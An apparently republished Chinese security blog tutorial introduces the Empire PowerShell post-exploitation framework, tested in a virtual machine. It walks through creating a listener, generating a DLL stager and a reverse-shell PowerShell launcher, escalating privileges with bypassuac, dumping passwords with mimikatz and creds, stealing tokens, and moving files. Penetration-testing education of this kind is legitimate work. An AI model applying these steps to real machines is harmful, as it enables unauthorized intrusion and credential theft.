初探域滲透神器Empire

0x01奇怪的開始

我趁手機不注意，把它自由落體了，好在屏幕沒裂開，只不過是斷觸了，要不對於已經窮瘋了的我無疑又是一筆經濟負擔。好在手機還在保修期內，可以送過去修，但是我去的時間點不對。售後說要下班了，手機要明天才能修，我也沒多說什麼，手機留下就回來了。晚上，蹲廁所，叼著煙對著手紙發獃，心想：「我擦，我484傻，明天還要去拿了，我幹嘛不明天再去修?」

翻著各大論壇，看到了Empire的關鍵字，沒看明白他到底在幹嘛。但是早聽大佬說過他們用Empire的光輝事迹，趁手機不再，研究下此神器

0x02 Empire簡介

一說內網，我們基本都是在第一時間想到Metasploit，因為有Metasploit這麼強大的存在我們很少能注意到別的工具。Metasploit的牛逼之處在於他不管是信息收集，滲透，後滲透，木馬，社工，你能想到的他基本都可以做到，殺人越貨必備啊。但是Empire就是針對內網滲透，針對Powershell，我們在內網滲透中肯能用到的powershell腳本，全部都在Empire的框架中了，更是域滲透神器！但是關於Empire的資料，國內真的是少的可憐，就那麼幾篇。做安全，不得不佩服國外的大牛們！

0x03 Empire基本用法

下載什麼的我就不廢話了，github上克隆回來運行install.sh就好

Github:EmpireProject/Empire

不喜歡用命令的同學可以去安裝一個GUI界面的，也是國外大牛用php寫的一個web界面

Github:interference-security/empire-web

大家自行安裝吧～～

先來看看Empire的界面是什麼樣子的，看起來跟Metasploit感覺是一樣的～ 高大上

我們可以很清楚的看到有180個模塊，0個監聽，0個代理

Agents用谷歌翻譯出來是代理的意思，我們把它理解成會話就行跟Metasploit一樣session。

我們首先要創建一個監聽，就跟Metaploit創建一個監聽載荷一個意思

在命令行里輸入Listener就可以進入監聽

Options / info 查看需要設置的選項info也是可以的，

我們只需要設置簡單的Host就可以了，當然如果想修改名字的話也可以

Set host http://你的ip:埠 設置HostnSet name smiletest 設置當前監聽的名字nExecute 執行 run也可以n

Empire可以生成14種類型的木馬

我們選擇dll（是不是有人又想到NSA的漏洞了- -,當然也可以，自由發揮吧）

Usestager dlln

會生成在/tmp/launcher.dll中了

Set Listener smiltestnExecuten

BacknLauncher smiltestn

直接生成powershell命令，當執行這命令的時候會給我們回彈一個shell

直接拖到虛擬機里去執行，真正的滲透環境中，直接在webshell里執行就好，但前提是目標機器必須有powershell

當我們執行後，命令行窗口一閃而過，接不到圖，但是在我本機下已經反彈了一個會話，可以查看我們的會話列表

agentsn

interact EZUGW142B4KDFBVSn

這個名字是Empire給我們生成的名字，看著這個名字感覺太長了，以後用起來感覺麻煩，我們可以修改這個名字

rename 原來的名字 修改的名字n

可以看到很多的命令，一點都不比Metasploit弱

在這裡輸入的命令如果不是這裡面的命令的話，我們的命令會被解析為windows命令執行，並給回顯。但是這裡要注意了，你每寫完一道命令敲下回車以後，不要感覺是沒有回顯，要稍等一下才會回顯出來

比如說，我寫一道ipconfig命令，並不再這個列表中，那麼我們會在靶機執行這道命令，如圖：

再來看看他的命令

Agents 和 back 這兩個命令在我們現在的情況來看是差不多的

Back 是返回上級，而我們的上級是agents，當寫agents的時候，也會回到agents文件

Bypassuac 是提權神級命令，敲完命令就提權

這裡返回了一個新的繪畫，區別就是在USERBANE前加了星號

有了這個*就代表已經提權成功了，我們先用沒有星號的執行mimikatz

它會給出如下提示

用有星號的試一試

已經讀取成功了，Empire有個很方便的地方，就是，我們不需要在mimikatz的回顯中去尋找密碼，他已經幫我們列舉好了，我們只需要執行creds命令，密碼就出來了。

從這裡便可竊取身份令牌

不過當然也有bypassuac不能直接提權的情況了，我們後續再說

Sc命令 截圖一張

Download 下載文件

用法：download [path]

Upload 當然就是上傳咯

用法：upload 文件 靶機路徑

Usemoudle 使用模塊，這才是最有用的地方。先來個惡作劇把，在靶機上彈窗，提示 「I am hacker」

usemodule trollsploit/messagen

靶機上的提示

這就完成了一次惡作劇

0x04 躺在床上的總結

大致學習了一下，感受到了Empire的強大之處，絲毫不弱與Metasploit他就是針對powershell的內網滲透工具，雖然沒有Metasploit那麼強大的各種平台都能打，但是單單針對windows，以及域滲透的強大之處是Metasploit不能比的。而且他還跟Metasploit一樣，有強大的介面，以便於我們寫我們自己的payload。絕對是一款不可多得的神兵利器！

想更深入了解Empire，請期待我的下一篇文章–《Empire域滲透實戰》

本文為 smileTT 原創稿件，授權嘶吼獨家發布，未經許可禁止轉載，如若轉載，請聯繫嘶吼編輯：t初探域滲透神器Empire 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：